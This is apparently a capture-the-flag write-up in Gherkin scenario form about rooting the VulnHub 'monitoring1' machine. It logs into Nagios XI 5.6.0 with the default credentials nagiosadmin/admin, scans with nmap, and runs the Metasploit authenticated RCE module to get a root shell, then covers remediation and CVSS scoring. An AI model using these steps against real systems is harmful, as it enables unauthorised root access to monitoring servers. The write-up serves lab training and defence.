## Version 1.4.1
## language: en

Feature:
  TOE:
    vulnhub
  Location:
    192.168.193.131
  CWE:
    CWE-268: Privilege Chaining
  Rule:
    REQ.R096: Set user required privileges
  Goal:
    Gain root access
  Recommendation:
    Upgrade the CMS version

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali            | 2020.3      |
    | Firefox         | 68.11.0esr  |
    | nmap            | 7.80        |
  TOE information:
    Given I am accessing monitoring1 vulnhub machine
    And the site has the caracteristics
    """
    OS: Ubuntu
    Server: Apache 2.4.18
    IP: 192.168.193.131
    """

  Scenario: Normal use case
    Given I access 'http://192.168.193.131'
    And click the button 'Access Nagios XI'
    Then I can see a Nagios XI login [evidence](nagioslogin.png)

  Scenario: Static detection
    When I access the HTML code
    And I look for usernames, CMS version, but i did not found any of them
    Then I look in google for Nagios XI default credentials
    And found a default username 'nagiosadmin'
    When I try the usual passwords I can log in with the password 'admin'
    Then the CMS credentials are
    """
    user: nagiosadmin
    password: admin
    """
    When I log into the system finding the version of Nagios in
    """
    523 <a href="http://nagios.com/products/nagiosxi" target="new">
    <b>Nagios XI</b></a> 5.6.0
    """
    Then the Nagios version is '5.6.0'

  Scenario: Dynamic detection
    Given I have the IP machine
    And the Nagios XI credentials and version
    Then I can execute the following command:
    """
    $ nmap -sV -sC -T4 -v -p- --min-rate=10000 192.168.193.131
    """
    Then I get the output:
    """
    80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
    |_http-favicon: Unknown favicon MD5: 8E1494DD4BFF0FC523A2E2A15ED59D84
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Nagios XI
    """
    When I look for a exploit in Nagios XI
    And found 'https://www.exploit-db.com/exploits/48191'
    Then I conclude it is vulnerable to the exploit

  Scenario: Exploitation
    Given I have Nagios IX CMS credentials
    And know the Nagios version is vulnerable
    Then I use metasploit, set the exploit with the command
    """
    $ use exploit/linux/http/nagios_xi_authenticated_rce
    """
    And set the exploit options with the commands
    """
    $ set LHOST 192.168.193.128
    $ set RHOST 192.168.193.131
    $ set PASSWORD admin
    """
    When I run the command 'exploit'
    And I get into the system with root privileges
    Then I spawn a shell, go to the root directory
    And I get the flag

  Scenario: Remediation
    Given I have patched the vulnerability by upgrading the CMS
    Then If I re-run my exploit in metasploit with command:
    """
    $ exploit
    """
    Then I get:
    """
    [*] Exploit completed, but no session was created.
    """
    Then I can confirm that the vulnerability was successfully patched

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.0/10 (High) - AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.4/10 (High) - E:F/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.4/10 (High) - CR:H/IR:H/AR:M/MAV:N/MAC:L/MPR:H/MUI:N/MS:C/MC:H/MI:H/MA:H

  Scenario: Correlations
    No correlations have been found to this date {2020-09-25}
